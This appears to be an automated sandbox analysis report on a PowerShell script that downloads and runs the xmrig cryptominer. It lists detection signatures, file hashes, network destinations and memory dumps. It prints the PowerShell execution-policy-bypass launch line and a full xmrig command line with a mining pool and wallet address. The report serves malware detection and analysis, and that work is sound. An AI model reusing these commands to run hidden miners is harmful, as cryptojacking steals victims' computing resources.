N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp

Files

memory/3500-0-0x00007FF887AD3000-0x00007FF887AD5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nchldiap.2jk.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3500-9-0x0000028BF7590000-0x0000028BF75B2000-memory.dmp

memory/3500-10-0x00007FF887AD0000-0x00007FF888592000-memory.dmp

memory/3500-11-0x00007FF887AD0000-0x00007FF888592000-memory.dmp

memory/3500-12-0x00007FF887AD0000-0x00007FF888592000-memory.dmp

memory/3500-15-0x0000028BF7710000-0x0000028BF771A000-memory.dmp

memory/3500-14-0x0000028BF7720000-0x0000028BF7732000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2148-46-0x0000012EC9F40000-0x0000012EC9F60000-memory.dmp

memory/2148-47-0x0000012EC9F90000-0x0000012EC9FB0000-memory.dmp

memory/3500-49-0x00007FF887AD3000-0x00007FF887AD5000-memory.dmp

memory/2148-48-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/3500-50-0x00007FF887AD0000-0x00007FF888592000-memory.dmp

memory/3500-51-0x00007FF887AD0000-0x00007FF888592000-memory.dmp

memory/2148-52-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-55-0x0000012EC9FD0000-0x0000012EC9FF0000-memory.dmp

memory/2148-54-0x0000012EC9FB0000-0x0000012EC9FD0000-memory.dmp

memory/2148-53-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-56-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-57-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-58-0x0000012EC9FB0000-0x0000012EC9FD0000-memory.dmp

memory/2148-59-0x0000012EC9FD0000-0x0000012EC9FF0000-memory.dmp

memory/2148-60-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-61-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-62-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-63-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-64-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-65-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-66-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-67-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-68-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-69-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-70-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-71-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-72-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-73-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-74-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-75-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-76-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-77-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-78-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-79-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-80-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-81-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-82-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-83-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-84-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-85-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-86-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-87-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-88-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-89-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-90-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-91-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-92-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-93-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-94-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-95-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-96-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-97-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-98-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-99-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-100-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-101-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-102-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-103-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-104-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-105-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-106-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-107-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-108-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-109-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-110-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-111-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-112-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-113-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-114-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-115-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-116-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp

memory/2148-117-0x00007FF7491E0000-0x00007FF749E13000-memory.dmp